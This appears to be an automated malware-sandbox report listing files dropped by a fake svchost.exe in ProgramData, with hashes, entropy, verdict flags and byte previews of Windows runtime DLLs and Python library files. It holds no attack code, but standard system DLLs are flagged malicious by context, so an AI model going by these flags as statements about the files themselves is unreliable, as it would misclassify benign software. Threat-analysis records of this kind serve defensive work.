SHA-512:	FA834E0E54F65D9A42AD1F4FB1086D26EDFA182C069B81CFF514FEB13CFCB7CB5876508F1289EFBC2D413B1047D20BAB93CED3E5830BF4A6BB85468DECD87CB6
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....x.........." .........0...............................................@......zM....`A........................................p...X............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-synch-l1-2-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	4.827260305412209
Encrypted:	false
SSDEEP:	192:ptZ3pWhhWpaWvkJ0f5AbVWQ4cRWTjPtngqtVVwX01k9z3AcVj:ptZ3pWhhWEaablmrVwR9zHp
MD5:	DD6F223B4F9B84C6E9B2A7CF49B84FC7
SHA1:	2EE75D635D21D628E8083346246709A71B085710
SHA-256:	8356F71C5526808AF2896B2D296CE14E812E4585F4D0C50D7648BC851B598BEF
SHA-512:	9C12912DAEA5549A3477BAA2CD05180702CF24DD185BE9F1FCA636DB6FBD25950C8C2B83F18D093845D9283C982C0255D6402E3CDEA0907590838E0ACB8CC8C1
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................." .........0...............................................@.......c....`A........................................p...x............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-sysinfo-l1-1-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22128
Entropy (8bit):	4.913093601910681
Encrypted:	false
SSDEEP:	192:yaIMFSgWhhW5JWGxVA6VWQ4cRWpRTJz56CqRqNX01k9z3A8oX/ld:ydgWhhW/xdlATh5DNR9zrGP
MD5:	9CA65D4FE9B76374B08C4A0A12DB8D2F
SHA1:	A8550D6D04DA33BAA7D88AF0B4472BA28E14E0AF
SHA-256:	8A1E56BD740806777BC467579BDC070BCB4D1798DF6A2460B9FE36F1592189B8
SHA-512:	19E0D2065F1CA0142B26B1F5EFDD55F874F7DDE7B5712DD9DFD4988A24E2FCD20D4934BDDA1C2D04B95E253AA1BEE7F1E7809672D7825CD741D0F6480787F3B3
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...~.l-.........." .........0...............................................@............`A........................................p................0...............0..p&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-timezone-l1-1-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	4.818883643812602
Encrypted:	false
SSDEEP:	192:MNBWhhWXWvkJ0f5AbVWQ4cRWysu56CqRqNX01k9z3A8oXPl1D:MXWhhWzaablb5DNR9zrGnD
MD5:	2554060F26E548A089CAB427990AACDF
SHA1:	8CC7A44A16D6B0A6B7ED444E68990FF296D712FE
SHA-256:	5AB003E899270B04ABC7F67BE953EACCF980D5BBE80904C47F9AAF5D401BB044
SHA-512:	FD4D5A7FE4DA77B0222B040DC38E53F48F7A3379F69E2199639B9F330B2E55939D89CE8361D2135182B607AD75E58EE8E34B90225143927B15DCC116B994C506
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...>.os.........." .........0...............................................@......JH....`A........................................p...H............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-util-l1-1-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	4.599642754410154
Encrypted:	false
SSDEEP:	192:5WhhWqMWvkJ0f5AbVWQ4cRWHLlDrwLobDX01k9z3AU93mldvQ:5WhhWqIaablklDMyDR9z/93mldvQ
MD5:	427F0E19148D98012968564E4B7E622A
SHA1:	488873EB98133E20ACD106B39F99E3EBDFACA386
SHA-256:	0CBACACCEDAF9B6921E6C1346DE4C0B80B4607DACB0F7E306A94C2F15FA6D63D
SHA-512:	03FA49BDADB65B65EFED5C58107912E8D1FCCFA13E9ADC9DF4441E482D4B0EDD6FA1BD8C8739CE09654B9D6A176E749A400418F01D83E7AE50FA6114D6AEAD2B
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....+..........." .........0...............................................@............`A........................................p...<............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-conio-l1-1-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	4.9059107418499295
Encrypted:	false
SSDEEP:	192:Xv0WhhW4WvkJ0f5AbVWQ4cRWG142Jp13s5yX01k9z3A3MIMttG5+:sWhhW8aabllxcYR9zEMIM3
MD5:	42EE890E5E916935A0D3B7CDEE7147E0
SHA1:	D354DB0AAC3A997B107EC151437EF17589D20CA5
SHA-256:	91D7A4C39BAAC78C595FC6CF9FD971AA0A780C297DA9A8B20B37B0693BDCD42C
SHA-512:	4FAE6D90D762ED77615D0F87833152D16B2C122964754B486EA90963930E90E83F3467253B7ED90D291A52637374952570BD9036C6B8C9EAEBE8B05663EBB08E
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...Aj............" .........0...............................................@......[.....`A.........................................................0...............0..h&..............p............................................................................rdata..p...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-convert-l1-1-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26224
Entropy (8bit):	4.884873448198051
Encrypted:	false
SSDEEP:	192:p9cyRWhhWnWGxVA6VWQ4cRWstTmil56CqRqNX01k9z3A8oXMQlE5V:YyRWhhWfxdlv3l5DNR9zrGMH
MD5:	33B85A64C4AF3A65C4B72C0826668500
SHA1:	315DDB7A49283EFE7FCAE1B51EBD6DB77267D8DF
SHA-256:	8B24823407924688ECAFC771EDD9C58C6DBCC7DE252E7EBD20751A5B9DD7ABEF
SHA-512:	B3A62CB67C7FE44CA57AC16505A9E9C3712C470130DF315B591A9D39B81934209C8B48B66E1E18DA4A5323785120AF2D9E236F39C9B98448F88ADAB097BC6651
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...U.gJ.........." .........@...............................................P...........`A.........................................................@...............@..p&..............p............................................................................rdata..n........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-environment-l1-1-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22128
Entropy (8bit):	4.744678517210711
Encrypted:	false
SSDEEP:	192:QWhhW8WGxVA6VWQ4cRWpuWQd9ZnAOVX01k9z3AAcoBVt/p:QWhhW8xdl331AqR9z75x
MD5:	F983F25BF0AD58BCFA9F1E8FD8F94FCB
SHA1:	27EDE57C1A59B64DB8B8C3C1B7F758DEB07942E8
SHA-256:	A5C8C787C59D0700B5605925C8C255E5EF7902716C675EC40960640B15FF5ACA
SHA-512:	AC797FF4F49BE77803A3FE5097C006BB4806A3F69E234BF8D1440543F945360B19694C8ECF132CCFBD17B788AFCE816E5866154C357C27DFEB0E97C0A594C166
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...9.4o.........." .........0...............................................@......j.....`A............................................"............0...............0..p&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-filesystem-l1-1-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	5.19435562954873
Encrypted:	false
SSDEEP:	192:LpUEpnWlC0i5C5WhhWQWvkJ0f5AbVWQ4cRWFVE7weX01k9z3AUSxi:LptnWm5C5WhhWkaabl4EnR9zVS
MD5:	931246F429565170BB80A1144B42A8C4
SHA1:	E544FAD20174CF794B51D1194FD780808F105D38
SHA-256:	A3BA0EE6A4ABC082B730C00484D4462D16BC13EE970EE3EEE96C34FC9B6EF8ED
SHA-512:	4D1D811A1E61A8F1798A617200F0A5FFBDE9939A0C57B6B3901BE9CA8445B2E50FC736F1DCE410210965116249D77801940EF65D9440700A6489E1B9A8DC0A39
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...2............." .........0...............................................@......eM....`A.........................................................0...............0..h&..............p............................................................................rdata..0...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-heap-l1-1-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22128
Entropy (8bit):	4.866130836410174
Encrypted:	false
SSDEEP:	192:mvh8Y17aFBRUWhhW1WGxVA6VWQ4cRWKk4NQlO8X01k9z3AenyHTs5:ALRWhhWhxdl3KlO8R9zhyH2
MD5:	546DA2B69F039DA9DA801EB7455F7AB7
SHA1:	B8FF34C21862EE79D94841C40538A90953A7413B
SHA-256:	A93C8AF790C37A9B6BAC54003040C283BEF560266AEEC3D2DE624730A161C7DC
SHA-512:	4A3C8055AB832EB84DD2D435F49B5B748B075BBB484248188787009012EE29DC4E04D8FD70110E546CE08D0C4457E96F4368802CAEE5405CFF7746569039A555
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...."]..........." .........0...............................................@............`A.........................................................0...............0..p&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-locale-l1-1-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22128
Entropy (8bit):	4.83017471722019
Encrypted:	false
SSDEEP:	192:eUnWhhWGWGxVA6VWQ4cRW4Ugd9ZnAOVX01k9z3AAcos:XWhhWyxdlCg31AqR9z7Q
MD5:	D8302FC8FAC16F2AFEBF571A5AE08A71
SHA1:	0C1AEE698E2B282C4D19011454DA90BB5AB86252
SHA-256:	B9AE70E8F74615EA2DC6FC74EC8371616E57C8EFF8555547E7167BB2DB3424F2
SHA-512:	CD2F4D502CD37152C4B864347FB34BC77509CC9E0E7FE0E0A77624D78CDA21F244AF683EA8B47453AA0FA6EAD2A0B2AF4816040D8EA7CDAD505F470113322009
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...6..q.........." .........0...............................................@......=.....`A............................................e............0...............0..p&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-math-l1-1-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	30312
Entropy (8bit):	5.1326972903419925
Encrypted:	false
SSDEEP:	384:+7yaFM4Oe59Ckb1hgmLNWhhWLmaabsFNY+R9zITl:MFMq59Bb1jg3zgNYi9zIh
MD5:	E9036FD8B4D476807A22CB2EB4485B8A
SHA1:	0E49D745643F6B0A7D15EA12B6A1FE053C829B30
SHA-256:	BFC8AD242BF673BF9024B5BBE4158CA6A4B7BDB45760AE9D56B52965440501BD
SHA-512:	F1AF074CCE2A9C3A92E3A211223E05596506E7874EDE5A06C8C580E002439D102397F2446CE12CC69C38D5143091443833820B902BB07D990654CE9D14E0A7F0
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................" .........P...............................................`.......,....`A.............................................%...........P...............P..h&..............p............................................................................rdata...'.......0..................@..@.data........@......................@....rsrc........P.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-process-l1-1-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22024
Entropy (8bit):	4.856891868078439
Encrypted:	false
SSDEEP:	192:PeXrqjd7xWhhWYWGxVA6VWQ42WnsxgV8FGecX01k9z3Ax+eXVG6:P4roWhhWAxdeHR9zi9r
MD5:	AD586EA6AC80AC6309421DEEEA701D2F
SHA1:	BC2419DFF19A9AB3C555BC00832C7074EC2D9186
SHA-256:	39E363C47D4D45BEDA156CB363C5241083B38C395E4BE237F3CFEDA55176453C
SHA-512:	15C17CBA6E73E2E2ADB0E85AF8ED3C0B71D37D4613D561CE0E818BDB2CA16862253B3CB291E0CF2475CEDCB7CE9F7B4D66752817F61CF11C512869EF8DABC92A
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...<SdT.........." .........0...............................................@............`A............................................x............0...............0...&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-runtime-l1-1-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26216
Entropy (8bit):	5.016983259688826
Encrypted:	false
SSDEEP:	192:RmGqX8mPrpJhhf4AN5/Ki9WhhWalWvkJ0f5AbVWQ4cRWpfd9ZnAOVX01k9z3AAco:Rysyr7LWhhWgaablu31AqR9z7
MD5:	3AE4741DB3DDBCB205C6ACBBAE234036
SHA1:	5026C734DCEE219F73D291732722691A02C414F2
SHA-256:	C26540E3099FA91356EE69F5058CF7B8AEE63E23D6B58385476D1883E99033C3
SHA-512:	9DD5E12265DA0F40E3C1432FB25FD19BE594684283E961A2EAFFD87048D4F892D075DCD049AB08AEEE582542E795A0D124B490D321D7BEB7963FD778EF209929
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....TR.........." .........@...............................................P............`A............................................4............@...............@..h&..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-stdio-l1-1-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26216
Entropy (8bit):	5.289373435146636
Encrypted:	false
SSDEEP:	384:mV2oFVh/WhhWqaablTUmEjezWSR9zchT1:mZcXzemiq9zW
MD5:	9A7E2A550C64DABFF61DAD8D1574C79A
SHA1:	8908DE9D45F76764140687389BFAED7711855A2D
SHA-256:	DB059947ACE80D2C801F684A38D90FD0292BDAA1C124CD76467DA7C4329A8A32
SHA-512:	70A6EB10A3C3BAD45BA99803117E589BDA741ECBB8BBDD2420A5AE981003AEBE21E28CB437C177A3B23F057F299F85AF7577FEC9693D59A1359E5FFC1E8EAABD
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...k. U.........." .........@...............................................P......="....`A............................................a............@...............@..h&..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-string-l1-1-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26224
Entropy (8bit):	5.286281713611342
Encrypted:	false
SSDEEP:	768:ECV5yguNvZ5VQgx3SbwA71IkFltor9zLszv:35yguNvZ5VQgx3SbwA71IutoBzLU
MD5:	CF115DB7DCF92A69CB4FD6E2AE42FED5
SHA1:	B39AA5ECA6BE3F90B71DC37A5ECF286E3DDCA09A
SHA-256:	EB8FE2778C54213AA2CC14AB8CEC89EBD062E18B3E24968ACA57E1F344588E74
SHA-512:	8ABD2754171C90BBD37CA8DFC3DB6EDAF57CCDD9BC4CE82AEF702A5CE8BC9E36B593DC863D9A2ABD3B713A2F0693B04E52867B51CD578977A4A9FDE175DBA97A
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.... .h.........." .........@...............................................P.......p....`A.........................................................@...............@..p&..............p............................................................................rdata.._........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-time-l1-1-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	5.246244940293721
Encrypted:	false
SSDEEP:	192:ms3hwD2WhhWLjWvkJ0f5AbVWQ4cRWcBweNQlO8X01k9z3AenDqzq:dWhhWTaabl3weKlO8R9zhDgq
MD5:	82E6D4FF7887B58206199E6E4BE0FEAF
SHA1:	943E42C95562682C99A7ED3058EA734E118B0C44
SHA-256:	FB425BF6D7EB8202ACD10F3FBD5D878AB045502B6C928EBF39E691E2B1961454
SHA-512:	FF774295C68BFA6B3C00A1E05251396406DEE1927C16D4E99F4514C15AE674FD7AC5CADFE9BFFFEF764209C94048B107E70AC7614F6A8DB453A9CE03A3DB12E0
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...G............" .........0...............................................@......1&....`A.........................................................0...............0..h&..............p............................................................................rdata..=...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-utility-l1-1-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	4.804443409916024
Encrypted:	false
SSDEEP:	192:gj/fHQduzWhhWxWvkJ0f5AbVWQ4cRWIknb7jepVWnSX01k9z3AThTVtXKX7:gj/fFWhhWJaablMb7jezWSR9zchT2X
MD5:	9A3B4E5B18A946D6954F61673576FA11
SHA1:	74206258CFD864F08E26EA3081D66297221B1D52
SHA-256:	CE74A264803D3E5761ED2C364E2196AC1B391CB24029AF24AEE8EF537EC68738
SHA-512:	DA21178F2E7F4B15C28AE7CB0CC5891EAA3BDD0192042965861C729839983C7DCBA9CFB96930B52DBE8A592B4713AA40762E54D846B8135456A09AE5BACBB727
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...2............." .........0...............................................@......W.....`A............................................^............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\base_library.zip

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	880569
Entropy (8bit):	5.682992961060893
Encrypted:	false
SSDEEP:	12288:lgYJu4KXWyBC6S4IEa8A4a2YID3dOVwx/fpEWertSLMNu:lgYJiVBFLa2vIVwx/fpEWe+MNu
MD5:	362D93516DEB1D6E6F9B8076415D9122
SHA1:	029541DDA9199A5FB84138D76049A4F42D603C36
SHA-256:	887F69E682EBD3A402D9E3462910D8EAB88D8AA8066F71B7D0AB28B1306A4314
SHA-512:	F1FDADD9CFD8DA84B1BEFFA12BCA2B4C26DFEF146204CF45EE8395B9F3419BDE0E9106BE82414D01B3509FE83D09EFD0BBB40D530B0A790DCB4A51A031FE4EDA
Malicious:	false
Preview:	PK..........!..^".5...5......._collections_abc.pyco....................................@.......d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Ze..Ze.e..Z+e.,....[d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d..de8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF

C:\Users\user\AppData\Local\Temp\_MEI49442\bcrypt\_bcrypt.pyd

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	316928
Entropy (8bit):	6.399172981599646
Encrypted:	false
SSDEEP:	3072:RrdaOOOJPELEbEhSoKbVeKuJgu3rAkbK7xokgwHSkbj57ytyE/pZxFuVpOUrjenn:SO2h0b0KuJguLbLFhkn57MyE3xFWpOn
MD5:	169518669942F1B7C9A0BC4D0D98651F
SHA1:	4C2132A29ABCD0B2E26F96D7BA54BC8968CC4853
SHA-256:	4904336E5DDD08DB8BE7694EEF0D1D83DE6799D6412952A82DCA4847A3F46251
SHA-512:	270AB970EB7C9BD5DB40FEF76F78FCA68A40266390F16D971C946A086F7C079314B78E068477CD083D9FAE2E76EE7CC8A4D8BA7DDC4F5F5B0C78767B77A4F858
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^R...3...3...3...K...3.......3.......3.......3.......3.. ....3...F...3..QK...3...3...3...3..H3..w....3..w....3..Rich.3..........PE..d....e\|e.........." ...&.b...p.......$....................................................`.............................................T........................"...................D..T....................E..(...PC..@............... ............................text...7`.......b.................. ..`.rdata..D?.......@...f..............@..@.data...............................@....pdata...".......$..................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\certifi\cacert.pem

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	292541
Entropy (8bit):	6.048162209044241
Encrypted:	false
SSDEEP:	6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/Q5MSRqNb7d8iu5NF:QWb/TRJLWURrI55MWavdF0D
MD5:	D3E74C9D33719C8AB162BAA4AE743B27
SHA1:	EE32F2CCD4BC56CA68441A02BF33E32DC6205C2B
SHA-256:	7A347CA8FEF6E29F82B6E4785355A6635C17FA755E0940F65F15AA8FC7BD7F92
SHA-512:	E0FB35D6901A6DEBBF48A0655E2AA1040700EB5166E732AE2617E89EF5E6869E8DDD5C7875FA83F31D447D4ABC3DB14BFFD29600C9AF725D9B03F03363469B4C
Malicious:	false
Preview:	.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz

C:\Users\user\AppData\Local\Temp\_MEI49442\cryptography-42.0.5.dist-info\INSTALLER

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\Users\user\AppData\Local\Temp\_MEI49442\cryptography-42.0.5.dist-info\LICENSE

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	197
Entropy (8bit):	4.61968998873571
Encrypted:	false
SSDEEP:	3:hWDncJhByZmJgXPForADu1QjygQuaAJygT2d5GeWreLRuOFEXAYeBKmJozlMHuO:h9Co8FyQjkDYc5tWreLBF/pn2mH1
MD5:	8C3617DB4FB6FAE01F1D253AB91511E4
SHA1:	E442040C26CD76D1B946822CAF29011A51F75D6D
SHA-256:	3E0C7C091A948B82533BA98FD7CBB40432D6F1A9ACBF85F5922D2F99A93AE6BB
SHA-512:	77A1919E380730BCCE5B55D76FBFFBA2F95874254FAD955BD2FE1DE7FC0E4E25B5FDAAB0FEFFD6F230FA5DC895F593CF8BFEDF8FDC113EFBD8E22FADAB0B8998
Malicious:	false
Preview:	This software is made available under the terms of either of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to cryptography are made.under the terms of both these licenses..

C:\Users\user\AppData\Local\Temp\_MEI49442\cryptography-42.0.5.dist-info\LICENSE.APACHE

Download File

